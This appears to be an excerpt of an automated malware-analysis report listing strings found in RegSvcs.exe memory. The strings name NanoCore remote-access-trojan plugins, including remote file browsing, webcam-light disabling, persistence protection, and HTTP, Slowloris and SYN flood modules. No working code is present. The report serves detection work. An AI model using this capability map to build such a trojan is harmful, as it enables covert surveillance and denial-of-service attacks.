onUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttribu